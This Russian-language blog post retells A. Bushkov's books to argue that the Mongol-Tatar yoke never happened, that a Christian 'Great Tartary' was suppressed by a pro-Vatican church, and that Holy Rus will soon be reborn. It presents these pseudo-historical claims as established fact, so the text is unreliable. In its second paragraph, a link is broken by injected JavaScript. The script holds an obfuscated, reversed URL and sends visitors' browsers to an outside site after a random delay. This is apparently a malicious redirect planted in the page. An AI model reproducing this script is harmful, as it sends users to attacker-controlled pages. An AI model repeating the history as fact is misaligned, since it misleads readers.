Мысли на тему Россия/Русь

Святая Русь. Куда её спрятали?На чтение 6 мин

Все говорят сегодня о России, и мало кто помнит о Руси — о Святой Руси. А ведь Святая Русь — это не сказка, не выдумка. Это было реальное государство, огромное по территории, христианское (древней традиции) по вере. Историки спрятали Святую Русь (по причинам, которых еще коснемся) под густой пеленой выдуманного «монголо-татарского ига». Под «игом» и спрятали Святую Русь.

Заканчиваю делиться фрагментами книги историка А. Бушкова «toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory.wikireading.ru/219662″ target=»_blank»>Россия, которой не было», «Было ли Монголо-татарское иго?» В конце, как обычно, делаю свои выводы.

«Русский ученый Лев Гумилёв (1912–1992) приводит свои доводы, что татаро-монгольское иго это миф. Он считает, что в это время было объединение русских княжеств с Ордой при главенстве Орды (по принципу «лучше худой мир») а Русь как бы считалась отдельным улусом, примкнувшим к Орде по договору. Они были единым государством со своими внутренними распрями и борьбой за централизованную власть. Л. Гумилев считал, что теория о татаро-монгольском иго на Руси была создана лишь в XVIII веке немецкими историками Готлибом Байером, Августом Шлецером, Герхардом Миллером под влиянием идеи о якобы рабском происхождении русского народа, по определенному социальному заказу правящего дома Романовых, которые хотели выглядеть спасителями России от ига.

Дополнительным аргументом в пользу того, что «вторжение» насквозь выдумано, является и то, что мнимое «вторжение» не внесло в русскую жизнь ничего нового.

Все, что творилось при «татарах», существовало и раньше в той или иной форме.

Нет ни малейших следов присутствия чужого этноса, иных обычаев, иных правил, законов, установлений. А примеры особо отвратительных «татарских зверств» при ближайшем рассмотрении оказываются вымышленными.

Чужеземное вторжение в ту или иную страну (если это не было просто грабительским набегом) всегда отличалось установлением в покоренной стране новых порядков, новых законов, сменой правящих династий, изменением структуры администрации, границ провинций, борьбой со старыми обычаями, насаждением новой веры и даже изменением названия страны. Ничего этого не было на Руси при татаро-монгольском иго.

В Лаврентьевской летописи, которую Карамзин считал самой древней и полной, три страницы, где рассказывалось о нашествии Батыя, были вырезаны и заменены какими-то литературными штампами о событиях XI–XII веков. Об этом писал Л. Гумилев со ссылкой на Г. Прохорова. Что же там было страшного, что пошли на подлог? Вероятно, что-то, что могло дать пищу для размышлений о странности монгольского нашествия.

На западе более чем 200 лет были убеждены в существовании на востоке огромного царства некоего христианского властителя «пресвитера Иоанна», чьими потомками и считались в Европе ханы «монгольской империи». Многие европейские хронисты «почему-то» отождествляли пресвитера Иоанна с Чингисханом, которого именовали и «царем Давидом». Некто Филипп, священник доминиканского ордена писал, что «христианство господствует везде на монгольском востоке».

Этим «монгольским востоком» и была христианская Русь. Убеждение о существовании царства пресвитера Иоанна долго держалось и стало повсеместно отображаться на географических картах того времени. Согласно европейским авторам, пресвитер Иоанн поддерживал теплые и доверительные отношения с Фридрихом II Гогенштауфеном, единственным из европейских монархов, который не испытывал страха при известии о вторжении «татар» в Европу и переписывался с «татарами». Он знал кто они на самом деле».

Можно сделать логический вывод:

Никакого монголо-татарского иго на Руси никогда не было. Был специфический период внутреннего процесса объединения русских земель и усиления царско-ханской власти в стране. Все население Руси делилось на мирных граждан, управляемых князьями, и постоянное регулярное войско, называемое ордой, под командованием воевод, которые могли быть русскими, татарами, турками или другой национальности. Во главе войска-орды стоял хан или царь, которому принадлежала верховная власть в стране. [38]

В то же время А. Бушков в заключении признает, что внешний враг в лице татар, половцев и других степных племен, обитавших в Поволжье (но, конечно, не монголов от границ Китая) на Русь в это время вторгался и эти набеги использовались русскими князьями в своей борьбе за власть.

После распада Золотой Орды, на бывшей её территории в разное время существовало несколько государств, наиболее значимыми из которых являются: Казанское ханство, Крымское ханство, Сибирское ханство, Ногайская орда, Астраханское ханство, Узбекское ханство, Казахское ханство.

Что касается Куликовской битвы 1380 г., то о ней писало (и переписывало) много хронистов, как на Руси, так и в Западной Европе. Насчитывается до 40 дубликатов описания этого очень крупного события, непохожих друг на друга, поскольку они создавались разноязычными хронистами из разных стран. Некоторые западные хроники ту же битву описывали как битву на европейской территории, а поздние историки ломали голову где же это происходило. Сравнение разных летописных хроник приводит к мысли, что это описание одного и того же события.

Под Тулой на Куликовом поле у реки Непрядвы никаких свидетельств большой битвы до сих пор не найдено, несмотря на неоднократные попытки и даже заявления ученых, нашедших поблизости пару наконечников от стрел. Нет ни массовых захоронений, ни значительных находок оружия.

Теперь мы уже знаем, что на Руси слова «татары» и «казаки», «войско» и «орда» обозначали одно и то же. Поэтому Мамай привел на Куликово поле не иноплеменную монголо-татарскую орду, а русские казачьи полки, а сама Куликовская битва, по всей вероятности была эпизодом междоусобной войны.

Гипотетические варианты «Московии Посполитой» или «Русского Халифата»

Бушков подробно разбирает огромное давление католицизма в западных русских княжествах, объединение с католическими Польшей и Литвой (тогда бывших в едином государстве «Жечи Посполитой»), создания на этой основе мощной славянской «Московии Посполитой» и влияния ее на европейские и мировые процессы.

Основания для этого были. В 1572 году умер последний король из династии Ягеллонов – Зигмунд II Август. Шляхта настаивала на избрании нового короля и одним из кандидатов был русский царь Иван Грозный. Он был Рюрикович и потомок князей Глинских, то есть, близкий родственник Ягеллонов (родоначальником которых был Ягелло, тоже Рюрикович на три четверти). В этом случае Русь, вероятнее всего, стала бы католической, объединившейся с Польшей и Литвой. Но история пошла иным путем — полное окатоличивание Руси увязло в славянской христианской традиции. В результате патриархом Никоном был достигнут Византийский компромис, который (десятилетиями военных походов) навязывался другим русским христианам.

Сложнее всего поддавались обращению в про-католическую форму религии жители Тартарии, укорененные в славянской традиции. Отсюда бесчисленные карательные экспедиции, которые потом стали выдавать за «освоение Сибири». Оказывается для рвущихся к власти церковников было выгоднее объявить Тартарию как новообретенную и новообращенную в христианство территорию, чем признать древнее единство народов, объединенных скифами и апостольским, Андреевским христианством. А так как церковь и занималась по сути переписыванием истории, то история и была переписана. Все, конечно, валят сегодня на Романовых, что это они, мол, переписали историю. Но справедливости ради надо отметить, что главным переписчиком русской истории были не они, а новая про-ватиканская церковь, воцарившаяся на Руси и превратившая ее в Россию.

Выводы

Тем не менее даже при той ситуации, что страна не пошла в католичество «на всю катушку», ватиканская реформа Софьи, охватившая Западную часть Руси (Великой Тартарии) сильно оттолкнула от Московии восточную часть Тартарии.

А. Бушков также пытается представить, что могло бы измениться в мировом развитии, если бы Россия приняла ислам и стала мусульманской. На это тоже были основания. Мы говорили о той близости (если не слиянности) древнего русского монотеистичного христианства с Исламом. Линию между христианином и мусульманином провести в ту пору было бы очень трудно.

Можно условно сказать, что «Ислам» Великой Тартарии был базовой формой христианства, присущей древней русской традиции и распространившейся широко и среди тюркских племен. Но при этом надо учитывать, что и русские князья и даже простые люди (такие как Афанасий Никитин) являют собой какую-то незнакомую нам форму общности Христианства и Ислама.

После окатоличивания Московии в правление Софьи нарушено было то хрупкое, естественное равновесие, которое достигалось на Святой Руси веками. Софья открыто засылалась на Русь с целью стравить Русь с мусульманами — сделать Русь частью папской машины крестовых походов против мусульман. Этого не произошло, но отношения между правоверными русскими и правоверными тюрками были испорчены на многие столетия. Это также заставило тюркских правоверных искать свой путь в арабской модели Ислама, вместо того, чтобы продолжить свое древнее единство с христианами. Великая Тартария развалилась. Рухнуло единство ее простой веры. Долгое еще время Сибирь, Урал, Заволжье будут разительно отличаться в своих культурных и религиозных традициях от западных княжеств.

Согласно пророчеств, Святая Русь, подобно сокрытому граду Китежу, в конце времен возродит свое апостольское христианство и сама возродится — при Белом царе. Это будет очень скоро. А пока нам начинает открываться прошлое величие, которое будет уже на совершенно новом уровне возрождено в грядущей Святой Руси.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

4.5/5

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.